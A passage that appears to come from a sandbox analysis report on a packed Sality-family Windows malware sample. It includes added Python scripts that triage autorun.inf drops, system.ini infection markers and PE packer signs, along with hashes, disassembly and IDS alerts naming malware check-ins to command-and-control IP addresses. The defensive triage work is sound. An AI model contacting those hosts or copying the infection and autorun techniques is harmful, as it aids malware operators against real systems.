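    """Case-folding INI parser: {section: {key: value}} with sections and keys
    lower-cased, ';' comment lines dropped and whitespace around '=' stripped.
    Random-case keys and junk comment lines therefore do not change the result."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections


def autorun_launch_targets(text: str) -> set:
    """Programs an autorun.inf would launch: the 'open' and 'shellexecute' keys
    plus every shell\\<verb>\\command key (any casing) in the [autorun] section."""
    targets = set()
    for key, value in parse_ini(text).get("autorun", {}).items():
        is_verb_cmd = key.startswith("shell\\") and key.endswith("\\command")
        if value and (key in {"open", "shellexecute"} or is_verb_cmd):
            targets.add(value.split()[0].lower())   # program name, arguments dropped
    return targets


def sality_systemini_marker(text: str):
    """DEVICEMB value from a [MCIDRV_VER] section, or None if absent. A stock
    system.ini has no such section; Sality writes one as its infection marker."""
    return parse_ini(text).get("mcidrv_ver", {}).get("devicemb")


def triage_drops(autorun_text: str, systemini_text: str) -> dict:
    """Summarise both drops the way a triage script would report them."""
    return {
        "autorun_targets": sorted(autorun_launch_targets(autorun_text)),
        "sality_devicemb": sality_systemini_marker(systemini_text),
    }


if __name__ == "__main__":
    print(triage_drops(AUTORUN_INF, SYSTEM_INI))
    # {'autorun_targets': ['voiv.exe'], 'sality_devicemb': '67320627207'}
```

Matching on the normalised key rather than on the raw bytes is the point: a signature for the literal string `open=` would miss `oPEN =`, while the parser reduces all four spellings to one target.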
Process: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 99328
Entropy (8bit): 7.591197977842813
Encrypted: false
SSDEEP: 1536:J99UU79L6NPegIlaIkjS1vv3crVlx+DXCM6bJBZ0t2W6rvRRVUOQDwn/x0rZQgX:J99UEd6xoyjS5oJ+rnybZNW6FRVUxpQ
MD5: 54F9AE74B9E1265AC60E9AD6CD28099D
SHA1: 750336A2D291E3C10311EB12F6922D0653B52DF7
SHA-256: E6B5C3597F1DEE7A6DA75D21A2A9D81BA7BC7455E1B1838490A9A358B84A78C0
SHA-512: BF68E424CEDE9260FE8C1BEB0FB3CC1560A5F97E88AD1F7B6174E7C6AD9F7DC92129A14943FEF5621FAF9979D030E43D54A24406CD6EB8D4DBFC7604B8E47B1A
Malicious: true
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.r..o...o...o...o...o..cp...o...p...o..Rich.o..........PE..L....N.L..................................... ....@.......................... ..................................................(....................................................................................................................text.............................m. ................................................................^.n..~..A...R..Ei....,c....M..U.....U..E.....E..M.....M..U.....U..E.....E..M.....M..U.....U.h N......@.j.....@.3...]...........................................................}.ExitProcess...Sleep.d.SetErrorMode..KERNEL32.dll..............................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\netsh.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 7
Entropy (8bit): 2.2359263506290326
Encrypted: false
SSDEEP: 3:t:t
MD5: F1CA165C0DA831C9A17D08C4DECBD114
SHA1: D750F8260312A40968458169B496C40DACC751CA
SHA-256: ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
SHA-512: 052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
Malicious: false
Preview: Ok.....
Static File Info

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9605067617139555
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
File size: 2'496'512 bytes
MD5: fa45b9c5e2a92b1b3d7d175c23ffc813
SHA1: 5832cef41cad1bc57ea1424572a3127a5ccba956
SHA256: 20d84dd8c73993a1012d7a9d9b837aa118182cb16daf4169a266c0b48a708af7
SHA512: 588dba9acc14a5a53502292d6df9b54f5aeb4599f9a3af1585d9e2403fae5470dd58f3fa7c22d16ba04a75bbd27af75c5e3fa1c5f46f2407b5ef17f3a1a7ee97
SSDEEP: 49152:T546z5zoX35n+ZO6ZtdpdjivaAmOl9RxBrHTxAXMeQ78M:xz5SYBLpdjiaApl9RxBrHTxAX/Q78M
TLSH: 22C533D15D5143D6D99A0EF0AF3EAA25035AA4CA002C7333E66D273D6C1F36E4E37686
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.0.T.c.T.c.T.c.K.c.T.cyH.c.T.c.K.c.T.c.,#c.T.c.T.c.T.c.".c.T.c."-c.T.cRich.T.c........................PE..L......W...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0x7d4058
Entrypoint Section: .boot
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x57EEE8CC [Fri Sep 30 22:35:56 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 56075ba1bea23d7b1dcf68ef072a7c9b
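The static fields above are the classic packed-binary triage signals: the entry point sits in .boot rather than .text (the report's 0x7d4058 is an absolute address; minus the image base 0x400000 it is RVA 0x3d4058, which is what gets compared against section ranges), the header preview lists sections named .imports, .themida and .boot, and whole-file entropy is 7.96 bits per byte. The following is an added example, not report output and not a Joe Sandbox component: a header-only PE32 parser that locates the entry-point section, scores each section's entropy and flags packer section names, plus a builder for a constructed test image. The section layout and contents of that test image are made up here; only the timestamp value 0x57EEE8CC is taken from the report, and the entropy threshold is a working assumption rather than a published cut-off.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# Section names that identify a packer/protector outright. .themida and .boot
# are the names seen in this sample's header; UPX0/UPX1 are the other common case.
PACKER_SECTION_NAMES = {".themida", ".boot", "upx0", "upx1"}
ENTROPY_THRESHOLD = 7.2   # bits/byte (assumed cut-off); compressed/encrypted data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def timestamp_iso(ts: int) -> str:
    """Render a PE TimeDateStamp (seconds since the Unix epoch, UTC) as ISO 8601."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()


def parse_pe32(pe: bytes):
    """Return (entry_rva, timestamp, sections) from a PE32 image, reading headers only."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    _machine, nsect, timestamp, _, _, opt_size, _chars = struct.unpack_from("<HHIIIHH", pe, coff)
    opt = coff + 20
    if struct.unpack_from("<H", pe, opt)[0] != 0x10B:
        raise ValueError("not a PE32 (32-bit) optional header")
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]   # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        # Section header: Name[8], VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, opt + opt_size + 40 * i)
        raw = pe[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"),
                         "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": shannon_entropy(raw)})
    return entry_rva, timestamp, sections


def triage_pe(pe: bytes) -> dict:
    """Packer triage: which section holds the entry point, and which sections look suspicious."""
    entry_rva, timestamp, sections = parse_pe32(pe)
    entry_section = None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["rawsize"]):
            entry_section = s["name"]
            break
    findings = []
    if entry_section is None:
        findings.append("entry point outside every section")
    elif entry_section.lower() != ".text":
        findings.append(f"entry point in non-standard section {entry_section}")
    for s in sections:
        if s["name"].lower() in PACKER_SECTION_NAMES:
            findings.append(f"packer section name {s['name']}")
        if s["rawsize"] >= 256 and s["entropy"] > ENTROPY_THRESHOLD:
            findings.append(f"high-entropy section {s['name']} ({s['entropy']:.2f} bits/byte)")
    return {"entry_section": entry_section, "compiled": timestamp_iso(timestamp),
            "overall_entropy": shannon_entropy(pe), "findings": findings}


def build_test_pe32(entry_rva: int, sections, timestamp: int = 0x57EEE8CC) -> bytes:
    """Construct a minimal PE32 image (headers plus raw section data) for testing.
    sections is a list of (name, virtual_address, raw_bytes); the layout is invented."""
    opt_size, align = 224, 0x200
    header_len = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    first_raw = -(-header_len // align) * align                   # round up to file alignment
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                     # AddressOfEntryPoint
    table, body, ptr = bytearray(), bytearray(), first_raw
    for name, va, raw in sections:
        padded = raw + b"\0" * (-len(raw) % align)
        table += struct.pack("<8sIIIIIIHHI", name.encode("ascii"), len(raw), va,
                             len(padded), ptr, 0, 0, 0, 0, 0x60000020)
        body += padded
        ptr += len(padded)
    image = dos + b"PE\0\0" + coff + opt + table
    return bytes(image + b"\0" * (first_raw - len(image)) + body)


if __name__ == "__main__":
    # Hypothetical layout echoing the report: code in .text, protector data in
    # .themida, entry point inside .boot. All section contents are constructed.
    sample = build_test_pe32(0x3000, [
        (".text", 0x1000, b"\xC3" * 0x200),
        (".themida", 0x2000, bytes(range(256)) * 4),
        (".boot", 0x3000, bytes(range(256)) * 2),
    ])
    print(triage_pe(sample))
```

Run against the real sample the same function reads the section table from the file's own headers; the builder exists only so the logic can be exercised without shipping malware alongside the script.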
Entrypoint Preview

Instruction
add al, 63h
jmp 00007F24B481D0EDh
sbb eax, 56EEF406h
imul ebx, edi, 33440A1Bh
test dl, FFFFFF97h
imul edx, edi, 6C596C96h
test dh, 0000006Eh
xor edi, 00007AC0h
jmp 00007F24B481D0E4h
test ah, cl
mov ah, ch
imul ecx, ecx
test eax, eax
jmp 00007F24B481D0EEh
imul eax, esi, 9290EA64h
imul eax, esi
movsx esi, di
call 00007F24B481D0E5h
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          lea ebx, dword ptr [53B7EABFh]
                                                                                                                                                                                                                                                                                          add al, 60h
                                                                                                                                                                                                                                                                                          xor ah, bl
                                                                                                                                                                                                                                                                                          mov ebp, 0000DB6Dh
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          xor ebp, 0000F84Fh
                                                                                                                                                                                                                                                                                          or ah, cl
                                                                                                                                                                                                                                                                                          xor ebp, 000049ABh
                                                                                                                                                                                                                                                                                          mov ch, dl
                                                                                                                                                                                                                                                                                          adc al, 11h
                                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                                          mov edi, ecx
                                                                                                                                                                                                                                                                                          mov ecx, ebp
                                                                                                                                                                                                                                                                                          cmp ebp, 00001F47h
                                                                                                                                                                                                                                                                                          je 00007F24B481D0E4h
                                                                                                                                                                                                                                                                                          mov esi, ebp
                                                                                                                                                                                                                                                                                          xchg bl, ah
                                                                                                                                                                                                                                                                                          lea edx, dword ptr [ecx]
                                                                                                                                                                                                                                                                                          cmp ecx, 00004596h
                                                                                                                                                                                                                                                                                          jne 00007F24B481D0ECh
                                                                                                                                                                                                                                                                                          lea edi, dword ptr [37A6656Dh]
                                                                                                                                                                                                                                                                                          mov cl, bl
                                                                                                                                                                                                                                                                                          bswap ecx
                                                                                                                                                                                                                                                                                          inc ecx
                                                                                                                                                                                                                                                                                          sub edx, 00000B55h
                                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                                          movd mm3, esi
                                                                                                                                                                                                                                                                                          mov edx, ebx
                                                                                                                                                                                                                                                                                          mov esi, 89D99669h
                                                                                                                                                                                                                                                                                          cmp eax, 75C8487Fh
                                                                                                                                                                                                                                                                                          sub edi, 000023ADh
                                                                                                                                                                                                                                                                                          test edi, edx
                                                                                                                                                                                                                                                                                          test edx, 01348F2Dh
                                                                                                                                                                                                                                                                                          bswap edi
                                                                                                                                                                                                                                                                                          and bh, FFFFFF8Fh
                                                                                                                                                                                                                                                                                          movzx ebp, al
                                                                                                                                                                                                                                                                                          mov eax, 00000C4Eh
                                                                                                                                                                                                                                                                                          dec bl
                                                                                                                                                                                                                                                                                          sub eax, 00000146h
                                                                                                                                                                                                                                                                                          sub esi, ecx
                                                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                                                          test bl, dh
                                                                                                                                                                                                                                                                                          pop edx
Programming Language:
• [LNK] VS98 (6.0) imp/exp build 8168
• [ C ] VS98 (6.0) build 8168
• [IMP] VS2008 SP1 build 30729
• [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1d04d | 0x6c | .imports
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x56c6 | 0x2842 | 09fc32784ba2cc76eef3a519baaa9777 | False | 1.0010673394139336 | data | 7.9613934272864615 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x7000 | 0x468 | 0x120 | ab97a7c1a36072dbd3ee6bf475fea3df | False | 1.0381944444444444 | data | 7.122004951277352 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x8000 | 0x130c4 | 0x12e00 | cf0a03b4145933a91daf14d36a146de5 | False | 0.9934809602649006 | OpenPGP Secret Key | 7.939872800590452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x1c000 | 0x1fa | 0xdd | 2ab615864d1c229a5d8b6b13d6bdcf16 | False | 1.0497737556561086 | data | 6.843910827105002 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.imports | 0x1d000 | 0x1000 | 0x200 | b46a658c005761019bbd9ca9b7e26a13 | False | 0.212890625 | data | 1.5314246902006263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.themida | 0x1e000 | 0x3b6000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot | 0x3d4000 | 0x24c000 | 0x24b600 | bfcc6f65a2cec2d6b022875a1a935392 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | GetModuleHandleA
SHLWAPI.dll | PathAppendW
MSVCRT.dll | _exit
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T12:41:34.975221+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49707 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:34.975221+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49707 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:39.935484+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:39.935484+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:39.935484+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49709 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:41.407737+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49712 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:41.407737+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49712 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:49.368405+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49716 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:49.368405+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49716 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:53.402228+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:53.402228+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:53.402228+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:55.419204+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49721 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:55.419204+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49721 | 185.53.178.50 | 80 | TCP
2024-10-18T12:41:59.701403+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:59.701403+0200 | 2012736 | ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin | 1 | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
2024-10-18T12:41:59.701403+0200 | 2018340 | ET MALWARE Win32.Sality-GR Checkin | 1 | 192.168.2.9 | 49722 | 190.120.227.91 | 8080 | TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:01.531631+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949723185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:01.531631+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949723185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:06.031031+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949724190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:07.602990+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949725185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:07.602990+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949725185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:11.645323+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949726190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:13.239676+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949727185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:13.239676+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949727185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:17.298575+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949728190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:18.602435+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949729185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:18.602435+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949729185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:22.644756+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949730190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:24.726632+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949731185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:24.726632+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949731185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:28.989555+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949732190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:30.465354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949735185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:30.465354+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949735185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:31.392262+02002816165ETPRO MALWARE Win32/Neutrino checkin 41192.168.2.949733194.5.152.21580TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:34.518806+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949736190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:36.979019+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949737185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:36.979019+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949737185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:41.055615+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949738190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:42.705591+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949740185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:42.705591+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949740185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:47.487267+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949741190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:49.865347+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949759185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:49.865347+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949759185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:54.346733+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949767190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:56.008076+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949784185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:42:56.008076+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949784185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002012736ET MALWARE Trojan-GameThief.Win32.OnLineGames.bnye Checkin1192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:00.351728+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949789190.120.227.918080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:01.755354+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949806185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:01.755354+02002018340ET MALWARE Win32.Sality-GR Checkin1192.168.2.949806185.53.178.5080TCP
                                                                                                                                                                                                                                                                                          2024-10-18T12:43:05.816068+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949814190.120.227.918080TCP
